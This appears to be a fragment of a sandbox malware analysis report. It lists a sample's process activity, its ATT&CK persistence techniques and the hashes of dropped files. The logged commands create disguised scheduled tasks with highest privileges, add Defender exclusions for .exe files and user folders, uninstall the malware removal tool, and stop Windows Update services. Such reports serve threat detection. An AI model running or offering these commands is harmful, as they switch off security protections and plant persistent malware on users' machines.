C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\MoUsoCoreWorker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Users\Default User\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3932
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:760
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4360
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3560
-
C:\ProgramData\VC_redist.x64.exeC:\ProgramData\VC_redist.x64.exe1⤵PID:4636
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵PID:4044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:4904
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2988
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:804
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:880
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2884
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:5068
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:3104
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:1384
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:2684
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:992
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:3996
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:1504
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.0MB
MD56f522c6f443b5e815df737613e53b422
SHA13beb085b55355b55795eddf86eb4c368c4c581b4
SHA256ee0daddb04a972a955454082b2a7ab7a1459fb2c6c086ea40983b6303cf97867
SHA5126964404b23f63e79f86cf1f1493bf0453d898f2e28a9521701ea6efce199dcc2f5b16885cfd89617c969fae00d98b820efddc2d8090377e65c71749a0ce1d0a1
-
Filesize
5.2MB
MD524f54afe87c5644bc986a4ed9143277d
SHA10061a8cd4ffe0b886c2f958e7185120f9aac20a9
SHA256aaa88abbf7647cb60519c678ac31095536dcde4ae5dc5587e9e6d549ea3e1b9d
SHA512e518e64d5e0ade368fff0a1ae4c373a7bc20b0ee874d6001f774bb91f8b8ab0b2e31a7d904cbb787739c6c30ac3e5a1864cbd41439190fe3a0228809f8679082
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
19KB
MD541b82c39af4486cdcb9dbdf975ffbb45
SHA1b7c442c45e9d2208e7fc5f622c4a2ab0a359d3b9
SHA25689e76c59a722a06f65def00b6e5488a90cdde38b71f3131e579e6f3b4180543d
SHA5121e20392b62e77b2bef27f9f4a621cae85a15d3b72232abf1e4c97a48fd0b613d36e2ace340505975a205376db5701961781026e3cdbd60fa24b9306f48784318
-
Filesize
948B
MD5a7ce8cefc3f798abe5abd683d0ef26dd
SHA1b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA2565e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64
-
Filesize
214B
MD5d11ebe9cbc18851d1de2ff570fb760d7
SHA1079dbbe6ffef259930af194d98607b5c0666da52
SHA256417eea8cb4902b7248bd7b34f52b062ede7a1a0534028ca80c39073abe61e9ef
SHA5120c0a7d4746dec8082ffc6b609a18beaaf5df3296d60ab57f864cf889e754c6b71e5d81a7eccca64a7675319bfee902d74f718edbed6ee08a6395a7c8a24875b6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
13.5MB
MD51befcac64af4c0525d46cc4f0aac89ce
SHA129d7107b3c16ca38a9d5a81cd567d66711aade97
SHA256ad0fc0d49a38576a7b7cc19c7a6dc96635970c7bb58a796803f18de2a3e6bac4
SHA5128019bfb5bd0466017d7459ff1c1980fddb98e740477b3c5245028d3d8a62f94837a59ee8f800cee3e5563a458c14dc4bf633ffa8556934025938e855d4139848
-
Filesize
12.9MB
MD515f46ddd6b99f3d61a3db9a50be87d72
SHA1e28e735dd38c38615b532f16c9085dbe5a3b05ca
SHA2560c24ee86f44d4e76d59e88f9bc21a0028af3b51145de0fea2c5cd2d67a45f05d
SHA512cb35ae969478b5e3a03dddbe6e166ca3b054f682703304f4dfd9769c997126075b115f11544005bf47b87d85119080410f04027503b193c61b991646302a9b24
-
Filesize
1.8MB
MD54cbc4448ae101b8b9e1b02caa1040a4b
SHA100aa83be2942deeeef4f5c07a07c9be7c8160578
SHA2562fa65e86a051452abd241294aa683f33741e712077290250242d2f2f1757e66a
SHA512bbc7fd635e04490472e8357670a147090de10e506b8cc8d80676f5de2db819c803aab7e48d769c8c53d9920fac32485a35377773795560cab306e296d840a7b9
-
Filesize
4.2MB
MD5cd79c232658ae6585d4e4606422ec140
SHA1530381d23ee2f73a05bcb0f83cbebed98b38ce47
SHA256de38a23675514a01fcaef1c98dddf93ec9f9f3baec93fb73ee056aa28d79d1f8
SHA51222ef67f152f179c34d8a38ace8d061d0aca10deed7c5eafd8259e3af84ea63baaf26510548343fba371d7bea4a148fbc2b090862c2b326d93f3010434574fc1f
-
Filesize
3.2MB
MD5bf1bc66d50dbe856c5af5cb63afdc898
SHA1389bec596983cc38cfa8d61a64a2215205a72f02
SHA256401a46e965d51a489ea2430dc6f474de2623435ad7ad8af6471daf046b371672
SHA512ba13f4619cf838a9f06a1fde9861e839fdcee6fa54bf5c34fba7bccfb8b0f0806f402fac20e110982e54ad5ca146802d5ed1d0ef01d699cafa7cc2bad238ee26
-
Filesize
6.2MB
MD5ea5cb32d57b04c9022ee61dc54225a15
SHA1c53a4c521ad89563ad5757867300aba8fdf0a5a2
SHA2561ad501c9462335f3ae2aa768e5be922a21d5d19a1294e802a60215f6c07ca8fd
SHA5122fa8b1c1e3cced9fc5163c66a2a04e8fe0574c985eb6c28f5b0491f49a0b46b288bbf85b0f5ef496694fcfbb766b25d59068b7086951774885343884f7ad3528
-
Filesize
2.1MB
MD5d6f133dee71ed4c119a2d2aaf4cf3a69
SHA1d31a9b77e1eb1308c6c686e7b1715999ad18019b
SHA2563c1ada57fbbe1a5fe4e56ab89545f9c38b888676ef303ffb2934d289937af83d
SHA5128ef3020a156a4ffa978b89336a04c3ea3498912680e7cb5b9348d5884812bf456c8e739fba8b81d48e5234a1627e15bb5ddc2c014c5ff1c00088ab6373ce9381
-
Filesize
3.1MB
MD5912ff4e169ed2797eb2811d53fa32b21
SHA11d30a58c1361f30b000a7a6178020562ea51c9e8
SHA2566d501a4c31103b36ffed7f94f5db1041b664e0aed3e94fb868a94740180a1ede
SHA512a566a82d7230282ff477c5abfcfdc3c6fb6a4f3064b6f7ab3aef712bfe118460262ecbe69640c6e3c39b6b9eeebf6ff60c6aea9486342eef55f6f7e9dd086427
-
Filesize
2.7MB
MD5523863b176989e0d286668451fad4451
SHA1e82feee7b13e153231fb9792772f59f4d37b9101
SHA2563753a3d6ce56f07f97f30a1a9577a7e9ecc324fc6c11508ac6fad7b907553390
SHA512d19265f18aac97d8515716d530cf149b068b80fa82bab425890b160b2a8b2016e47a480bd187bb66496aa593fb2513bf2b5b1147d7489a5b8fa3a80ac8b964e4
-
Filesize
4.6MB
MD565dca75c5e4489e958c3d4c5b869db74
SHA148726e64078357f823ad7f890d370991eda3372d
SHA256e2cb00fd58835e5786f979708a9778733ca7ecea514ebf65b1182377ef13be55
SHA512862845ec5e978462d3aecedd11527e88f57bcc0170780cae1400c7c69e1c8cfe8e0a6965d3bafd85878a28e925d27d2fcfd0203acb3145b160d47965e628dbb7
-
Filesize
5.1MB
MD5f951a038ccf22cc14b8b5fd43e201d23
SHA176b54f2ae80fa5a93b0b87ade82ee09bd04a0caf
SHA256c90c50d1f3006568c150cea12d38feaea65395ce90aeaf974cfe1006bc2a5a0c
SHA512a76c44882d60349fa65d0487f45f6c9571e04e29b0d072228e0f5f9dce315fd8aaed06f1e2a9f2554cdb7071fb75935e5a16c8b7a455eb827919c01f1749343a